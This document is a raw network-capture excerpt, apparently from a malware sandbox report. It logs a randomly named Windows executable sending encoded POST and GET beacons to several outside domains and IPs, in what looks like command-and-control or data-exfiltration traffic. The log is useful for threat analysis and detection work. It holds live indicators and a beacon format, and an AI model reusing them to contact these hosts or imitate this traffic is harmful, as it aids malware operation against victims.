                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zz%2FDBL1HTZumcMfI2y2kabyNW1%2BfDruNsqJWQ0Z4EjfKNWyJxRd8vtx2CBfoTpZoLZH71wTvdQyrgExHcQVv5fkZHVf3k3bdB4yByOpXqeCzHqhaIEJUaoE%2BLQopc9SrJjpxtNOMgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1902993d553354-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 39 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 b3 c9 4d 2d 49 54 48 ce 48 2c 2a 4e 2d b1 55 2a 2d 49 d3 b5 50 52 d0 b7 b3 29 c9 2c c9 49 b5 7b b6 b8 e1 d9 d6 ee 27 3b d6 da e8 43 04 6c 52 32 cb ec 5e 6c df fc 62 ef 1a b0 28 88 6b a3 0f 36 8a cb a6 38 b9 28 b3 a0 c4 4e a1 3c 33 2f 25 bf 5c 2f 27 3f 39 b1 24 33 3f 4f 2f a3 28 35 4d c1 56 49 3f 37 af c8 5c df 3e a9 a4 3c 31 cd d6 c2 dc cc c0 d2 c2 cc 48 c9 5a c1 46 1f aa 11 00 00 00 ff ff e3 02 00 ad a1 3c 84 94 00 00 00 0d 0a
                                    Data Ascii: 9e(M-ITHH,*N-U*-IPR),I{';ClR2^lb(k68(N<3/%\/'?9$3?O/(5MVI?7\><1HZF<
                                    Jul 11, 2024 15:06:19.933139086 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    7 | 192.168.2.6 | 49729 | 188.114.97.3 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:21.902606010 CEST | 1887 | OUT | POST /mnr7/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.alphacentura.com
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.alphacentura.com
                                    Referer: http://www.alphacentura.com/mnr7/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6b 74 37 65 45 31 73 58 61 37 49 57 59 6f 59 68 30 71 58 72 77 39 61 75 78 52 72 70 48 6d 62 4d 45 36 6e 6c 6b 76 39 4c 79 72 79 41 6d 2f 62 4b 72 32 79 4e 6f 55 58 6a 56 4b 54 72 4c 74 71 65 47 38 41 31 63 42 66 33 41 36 51 35 37 4c 4d 77 2b 43 4c 36 6a 63 43 4c 64 66 68 2f 56 72 30 30 38 67 49 44 4d 50 37 4b 52 32 47 4e 4f 67 71 41 5a 35 62 61 41 48 4a 47 62 73 76 7a 42 5a 72 63 39 77 4b 67 30 65 46 65 70 6d 59 75 31 6b 36 33 64 78 4b 69 67 5a 2f 79 49 6d 6e 56 4e 79 66 52 71 65 54 46 79 41 72 6d 34 35 77 56 44 5a 4a 31 75 36 74 54 4e 59 46 78 2f 7a 53 59 38 59 55 64 72 78 37 63 4a 37 38 72 7a 6a 62 52 58 77 2b 6b 4d 72 53 32 30 64 62 69 4c 51 4b 2f 30 4c 56 6b 6b 51 78 35 61 79 45 33 52 51 75 38 78 6b 68 7a 45 76 73 2b 4c 38 4c 4c 45 34 62 76 6b 78 4d 43 2f 52 6d 73 47 35 48 38 46 34 51 6e 6d 69 68 32 53 63 34 4b 62 6f 4d 48 6a 4b 79 52 37 4c 48 72 73 4b 6a 44 71 75 73 31 45 7a 79 54 57 44 6d 66 38 4a 56 49 4e 67 71 39 6b 50 51 55 32 6e 45 30 65 4f 65 79 43 44 53 6a 47 6f 73 63 35 77 41 [TRUNCATED]
                                    Data Ascii: bB= [TRUNCATED]


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    8 | 192.168.2.6 | 49730 | 188.114.97.3 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:24.480320930 CEST | 583 | OUT | GET /mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A= HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.alphacentura.com
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:06:25.063030005 CEST | 922 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 11 Jul 2024 13:06:25 GMT
                                    Content-Type: text/html;charset=utf8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YvL6%2BsqeJDnXisQVpVxxkB6pvkgHXVZv9SpaAxeAGE55qu9vaQQ4%2B6GgC%2BB65sCUUvxM7PHspFQVJq0tr27bfP5I3pOc4EhofcatfHKTkg3%2BFekUmWyH9tevqdOsfNUuW51blokbMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a1902b96e1b4262-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 31 32 39 0d 0a 3c 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e e6 a3 80 e6 b5 8b e4 b8 ad 3c 2f 74 69 74 6c 65 3e 3c 64 69 76 3e e8 b7 b3 e8 bd ac e4 b8 ad 3c 2f 64 69 76 3e 3c 2f 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 22 2f 6d 6e 72 37 2f 3f 47 58 3d 69 50 39 78 43 4c 26 62 42 3d 70 76 54 2b 48 42 39 59 52 4b 49 2b 50 4f 51 78 30 62 2f 4d 2f 75 62 67 78 68 71 70 61 45 58 32 42 5a 6a 4a 6b 62 73 4a 7a 61 58 35 6d 64 62 63 69 6e 36 4b 74 32 44 39 58 4f 6a 70 4a 75 76 6c 41 71 38 45 66 56 76 48 55 39 39 5a 2b 49 45 52 35 56 4c 78 75 50 53 69 58 73 68 78 5a 36 77 44 6a 6a 6f 2b 42 75 37 66 51 57 32 41 42 31 2f 55 63 59 43 54 55 51 74 35 66 73 6e 65 51 5a 4b 4d 37 51 72 79 39 37 41 3d 26 62 74 77 61 66 3d 39 34 34 39 32 36 30 30 22 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 129<html><meta charset="utf-8" /><title></title><div></div></html><script> window.location.href ="/mnr7/?GX=iP9xCL&bB=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxuPSiXshxZ6wDjjo+Bu7fQW2AB1/UcYCTUQt5fsneQZKM7Qry97A=&btwaf=94492600"; </script>10


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    9 | 192.168.2.6 | 49732 | 134.122.138.60 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:32.631654978 CEST | 850 | OUT | POST /emnz/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.xn72dkd7scx.shop
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.xn72dkd7scx.shop
                                    Referer: http://www.xn72dkd7scx.shop/emnz/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 71 39 32 67 32 33 45 38 4f 32 6d 2f 6b 4b 77 35 6b 48 4a 62 47 4b 37 6e 4f 50 53 75 7a 33 41 77 47 4b 52 33 61 6b 56 79 43 58 2f 33 77 33 55 51 61 4e 31 35 57 61 75 77 76 54 4d 7a 57 4b 69 38 4d 47 47 4b 30 47 43 33 79 42 48 74 35 47 57 76 59 53 2b 35 41 4d 53 70 4d 4b 6d 6f 56 58 4c 55 48 71 61 4b 4a 77 42 68 75 74 6c 2b 6c 78 66 75 4a 36 32 4d 69 6d 42 6c 34 33 47 33 45 57 78 31 4c 47 30 36 75 39 49 6a 32 59 78 44 43 63 50 77 4f 52 31 4b 44 5a 78 64 50 6f 44 7a 38 52 6e 2b 56 42 62 35 37 73 54 6f 4c 58 43 76 4d 59 68 4d 31 54 43 33 31 59 45 65 63 55 48 51 4c 79 75
                                    Data Ascii: bB=lDpH6KcNafvQsq92g23E8O2m/kKw5kHJbGK7nOPSuz3AwGKR3akVyCX/3w3UQaN15WauwvTMzWKi8MGGK0GC3yBHt5GWvYS+5AMSpMKmoVXLUHqaKJwBhutl+lxfuJ62MimBl43G3EWx1LG06u9Ij2YxDCcPwOR1KDZxdPoDz8Rn+VBb57sToLXCvMYhM1TC31YEecUHQLyu
                                    Jul 11, 2024 15:06:33.405200958 CEST | 446 | IN | HTTP/1.1 301 Moved Permanently
                                    Server: nginx/onex
                                    Date: Thu, 11 Jul 2024 13:06:33 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://www.xn72dkd7scx.shop/emnz/
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                    Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    10 | 192.168.2.6 | 49733 | 134.122.138.60 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:35.210818052 CEST | 874 | OUT | POST /emnz/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.xn72dkd7scx.shop
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.xn72dkd7scx.shop
                                    Referer: http://www.xn72dkd7scx.shop/emnz/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 47 6e 41 77 6e 36 52 32 62 6b 56 6e 43 58 2f 38 51 33 52 64 36 4e 2b 35 57 65 6d 77 76 66 4d 7a 53 71 69 38 49 4b 47 4a 48 75 42 78 69 42 46 6d 5a 47 55 68 34 53 2b 35 41 4d 53 70 49 69 4d 6f 55 7a 4c 54 30 43 61 4b 6f 77 43 69 75 74 69 2f 6c 78 66 6b 5a 36 36 4d 69 6d 7a 6c 38 32 6a 33 48 75 78 31 4a 4f 30 36 37 42 48 73 32 5a 36 64 79 64 74 30 39 73 45 54 7a 4d 64 52 4d 34 52 77 72 6f 41 32 44 41 42 6c 49 73 77 36 62 33 41 76 4f 41 54 4d 56 54 6f 31 31 67 45 4d 4c 59 67 66 2f 58 4e 70 4a 44 6f 49 51 48 30 77 38 2b 36 44 68 32 34 4a 51 49 42 79 41 3d 3d
                                    Data Ascii: bB=lDpH6KcNafvQsO52t33E7u2lzEKwzEHNbGW7nK/CuGnAwn6R2bkVnCX/8Q3Rd6N+5WemwvfMzSqi8IKGJHuBxiBFmZGUh4S+5AMSpIiMoUzLT0CaKowCiuti/lxfkZ66Mimzl82j3Hux1JO067BHs2Z6dydt09sETzMdRM4RwroA2DABlIsw6b3AvOATMVTo11gEMLYgf/XNpJDoIQH0w8+6Dh24JQIByA==
                                    Jul 11, 2024 15:06:36.061991930 CEST | 446 | IN | HTTP/1.1 301 Moved Permanently
                                    Server: nginx/onex
                                    Date: Thu, 11 Jul 2024 13:06:35 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://www.xn72dkd7scx.shop/emnz/
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                    Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    11 | 192.168.2.6 | 49734 | 134.122.138.60 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:37.773257971 CEST | 1887 | OUT | POST /emnz/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.xn72dkd7scx.shop
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.xn72dkd7scx.shop
                                    Referer: http://www.xn72dkd7scx.shop/emnz/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6c 44 70 48 36 4b 63 4e 61 66 76 51 73 4f 35 32 74 33 33 45 37 75 32 6c 7a 45 4b 77 7a 45 48 4e 62 47 57 37 6e 4b 2f 43 75 46 48 41 77 56 79 52 32 34 4d 56 68 79 58 2f 78 77 33 51 64 36 4e 76 35 53 79 69 77 76 44 63 7a 51 53 69 2b 72 43 47 64 69 61 42 34 69 42 46 70 35 47 58 76 59 54 38 35 41 64 5a 70 4d 47 4d 6f 55 7a 4c 54 79 2b 61 4e 35 77 43 6b 75 74 6c 2b 6c 78 44 75 4a 36 65 4d 68 57 4a 6c 38 79 64 30 32 4f 78 37 4a 65 30 38 4a 70 48 68 32 5a 34 63 79 64 4c 30 39 67 66 54 79 67 76 52 4e 38 37 77 73 59 41 6d 31 31 57 2f 4b 59 61 6e 4e 7a 36 34 35 6f 75 4e 52 44 5a 37 32 30 72 45 4a 63 42 41 72 4f 2f 68 50 66 4d 4a 44 72 78 79 2b 47 41 44 57 6e 39 64 54 31 33 6f 56 6a 72 72 57 37 32 4f 37 48 42 30 4d 53 56 47 38 31 4d 49 4f 43 53 34 4f 37 30 48 6d 63 57 67 6c 35 63 57 4a 36 6b 73 42 31 59 48 78 4f 4f 47 52 54 65 45 62 4e 4e 79 55 4f 6d 4c 4c 36 30 63 62 35 61 6f 54 59 43 74 6b 44 42 46 74 6d 32 63 34 48 4b 45 6b 44 64 56 69 51 42 66 72 65 35 32 42 56 6b 31 65 44 73 47 32 78 53 68 73 6f [TRUNCATED]
                                    Data Ascii: bB= [TRUNCATED]
                                    Jul 11, 2024 15:06:38.550508976 CEST | 446 | IN | HTTP/1.1 301 Moved Permanently
                                    Server: nginx/onex
                                    Date: Thu, 11 Jul 2024 13:06:38 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://www.xn72dkd7scx.shop/emnz/
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                    Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    12 | 192.168.2.6 | 49735 | 134.122.138.60 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:40.341511965 CEST | 583 | OUT | GET /emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.xn72dkd7scx.shop
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:06:41.107443094 CEST | 596 | IN | HTTP/1.1 301 Moved Permanently
                                    Server: nginx/onex
                                    Date: Thu, 11 Jul 2024 13:06:40 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://www.xn72dkd7scx.shop/emnz/?bB=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK87Qltir3slpfPozUvsqGQgAfOSyHKAppI3MtD1Vl5l86WUTbGvYQ=&GX=iP9xCL
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                    Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    13 | 192.168.2.6 | 49736 | 35.212.86.52 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:46.273374081 CEST | 859 | OUT | POST /s992/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dynamologistics.net
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dynamologistics.net
                                    Referer: http://www.dynamologistics.net/s992/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 57 4e 2b 5a 7a 38 69 67 6e 34 43 6f 58 44 64 75 53 6b 58 67 53 43 4c 51 2b 6e 6f 52 7a 73 6d 4c 58 51 38 57 4a 65 79 51 73 4f 44 77 52 5a 52 45 75 42 39 69 53 50 4f 6d 41 33 75 4b 53 39 30 48 35 30 4e 59 54 5a 47 4c 38 69 30 35 45 70 70 79 72 61 32 56 31 70 79 52 74 6b 46 41 53 77 6b 7a 4b 52 62 52 6f 63 77 71 43 30 66 38 41 75 53 75 7a 34 36 64 55 44 4c 77 45 71 5a 71 6b 39 41 2f 4d 53 79 70 52 54 75 48 75 65 6c 38 61 6e 5a 58 56 44 70 50 41 2f 6d 62 57 6b 77 50 74 56 4c 76 32 62 7a 56 68 31 31 46 69 35 76 65 44 7a 74 7a 55 4d 4b 6d 6a 45 47 63 67 4a 73 38 75 35 6c 66 79 76 51 45 50 76 5a 49 43 68 71 4b
                                    Data Ascii: bB=WN+Zz8ign4CoXDduSkXgSCLQ+noRzsmLXQ8WJeyQsODwRZREuB9iSPOmA3uKS90H50NYTZGL8i05Eppyra2V1pyRtkFASwkzKRbRocwqC0f8AuSuz46dUDLwEqZqk9A/MSypRTuHuel8anZXVDpPA/mbWkwPtVLv2bzVh11Fi5veDztzUMKmjEGcgJs8u5lfyvQEPvZIChqK
                                    Jul 11, 2024 15:06:46.787440062 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:46 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
                                    Jul 11, 2024 15:06:46.787462950 CEST | 1236 | IN | Data Raw: 34 e3 10 ca cd fe d3 01 79 31 2f 3d ae 1e bf 7c 98 64 e8 fa f6 f1 d3 71 ff 2b da de e3 fd d5 5f 5c c8 4c 8d 1c a2 e9 bc 7a da dc ec 8f ef 37 d7 f7 4f 9b cd d5 ed c3 d5 71 da 74 fd 75 13 ba 9c 79 b3 19 9b b3 97 ce b1 dc 1d 3e 8e 9e 79 f1 34 eb 22
                                    Data Ascii: 4y1/=|dq+_\Lz7Oqtuy>y4"zz9o|@ss{59r3`'9;_=^= M>'tduwwl'*k%a7y7rr}eu{=_zqTpC9c=C?L
